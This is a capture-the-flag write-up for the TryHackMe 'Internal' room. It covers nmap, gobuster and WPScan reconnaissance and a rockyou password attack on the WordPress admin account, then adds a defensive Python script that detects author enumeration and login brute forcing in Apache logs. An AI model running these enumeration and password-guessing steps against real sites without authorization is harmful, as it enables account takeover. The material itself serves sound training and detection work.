This is a writeup for Internal on TryHackMe
The basics
As with other tasks, we have to make sure that we're connected to THM's VPN and boot the machine. For this task we also need to add the target to /etc/hosts on the attacker machine, like this:
$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.10     internal.thm
Without this entry, part of the task (anything that relies on the internal.thm hostname) won't work. With that set, let's roll!
Tasks
Now what? Given that we need to find two flags, one for a user and one for root, we start by scanning the server with nmap.
$ nmap -sC -sV -oN nmap/initial <ip>
Nmap scan report for <ip>
Host is up (0.064s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So! There are two open ports, 22 and 80. For the time being we have little use for port 22. Although there is a publicly known exploit for the OpenSSH version the server reports, we don't need it; there's a better and faster route than trying to make that exploit work. (ugh)
Let's focus on the other open port: 80. As shown above, nmap is telling us there's nothing there but a default Apache page. But is that really all?
Time to bust out our second secret weapon: Gobuster.
$ gobuster dir -u internal.thm -w /usr/share/wordlists/dirb/common.txt -x py,php
===============================================================
/blog (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
/wordpress (Status: 301)
Right off the bat, three folders stick out: blog, phpmyadmin, and wordpress. Poking around a bit further, we see that /blog and /wordpress are practically the same, so we just focus on /blog. The other folder, /phpmyadmin, could be an entry point as well, but for now let's poke around WordPress.
With that said, let's bring out another scanner: WPScan. For starters, we set it up to enumerate users:
$ wpscan --url http://internal.thm/blog/ --enumerate u
[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
Well, of course. With a username found, let's hunt down its password.
$ wpscan --url http://internal.thm/blog/ -U admin -P /opt/rockyou.txt -t 3
[!] Valid Combinations Found:
 | Username: admin, Password: [redacted]
Woohoo! A tiny part of the task is done. There's still a long way to go, but we're getting there.
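Both WPScan steps above are noisy from the server's side: author-ID enumeration is a run of `?author=N` requests, and the password attack is a burst of POSTs to wp-login.php that each come back 200 (the login form re-rendered with an error) until one comes back 302 (WordPress redirecting a successful login). The following is an added example, not part of the original writeup, showing how a defender would spot both patterns in an Apache access log. The log lines, IPs and timestamps are constructed samples; the thresholds are assumptions to tune per site.

```python
"""Flag WordPress user enumeration and login brute forcing in Apache logs.

Added example for this writeup. The sample log below is constructed; the
detection thresholds (min_ids, threshold, window) are assumed starting points.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format: ip ident user [ts] "method path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')


def _line(ip, second, method, path, status, ua):
    """Build one constructed combined-format log line, `second`s after 10:00:00."""
    ts = datetime(2024, 1, 1, 10, 0, 0) + timedelta(seconds=second)
    return (f'{ip} - - [{ts.strftime("%d/%b/%Y:%H:%M:%S")} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 0 "-" "{ua}"')


# Constructed sample: one scanner host probing author IDs, then guessing
# passwords (12 failures, then a 302 = success), plus one normal login.
SAMPLE_LOG = "\n".join(
    [_line("10.9.0.5", 1, "GET", "/blog/?author=1", 301, "WPScan v3"),
     _line("10.9.0.5", 1, "GET", "/blog/?author=2", 404, "WPScan v3"),
     _line("10.9.0.5", 2, "GET", "/blog/?author=3", 404, "WPScan v3")]
    + [_line("10.9.0.5", 10 + i, "POST", "/blog/wp-login.php", 200, "WPScan v3")
       for i in range(12)]
    + [_line("10.9.0.5", 22, "POST", "/blog/wp-login.php", 302, "WPScan v3"),
       _line("10.9.0.7", 300, "GET", "/blog/", 200, "Mozilla/5.0"),
       _line("10.9.0.7", 305, "POST", "/blog/wp-login.php", 302, "Mozilla/5.0")]
)


def parse_log(text):
    """Parse combined-format lines into dicts; unparsable lines are skipped."""
    entries = []
    for raw in text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], TS_FMT)
        e["status"] = int(e["status"])
        entries.append(e)
    return entries


def detect_author_enumeration(entries, min_ids=3):
    """IPs that requested at least `min_ids` distinct ?author=N values."""
    ids = defaultdict(set)
    for e in entries:
        m = AUTHOR_RE.search(e["path"])
        if m and e["method"] == "GET":
            ids[e["ip"]].add(int(m.group(1)))
    return {ip for ip, seen in ids.items() if len(seen) >= min_ids}


def detect_login_bruteforce(entries, threshold=10, window=timedelta(seconds=60)):
    """IPs with >= `threshold` failed wp-login.php POSTs inside any `window`."""
    posts = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["path"].endswith("wp-login.php"):
            posts[e["ip"]].append(e)
    findings = {}
    for ip, evs in posts.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e["ts"] for e in evs if e["status"] == 200]  # form re-rendered
        start, peak = 0, 0
        for end in range(len(fails)):            # sliding window over failures
            while fails[end] - fails[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            last_fail = max(fails)
            # a 302 at or after the last failure means a guess eventually worked
            succeeded = any(e["status"] == 302 and e["ts"] >= last_fail for e in evs)
            findings[ip] = {"failed_attempts": len(fails),
                            "peak_per_window": peak,
                            "likely_success": succeeded}
    return findings


def analyze(text):
    """Run both detectors over a log and return their findings keyed by name."""
    entries = parse_log(text)
    return {"author_enumeration": detect_author_enumeration(entries),
            "login_bruteforce": detect_login_bruteforce(entries)}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

On the sample log this flags 10.9.0.5 for both behaviours and marks the brute force as having likely succeeded, while the single normal login from 10.9.0.7 is left alone. Limiting login attempts per source and blocking the `?author=` redirect are the usual mitigations the detection points at.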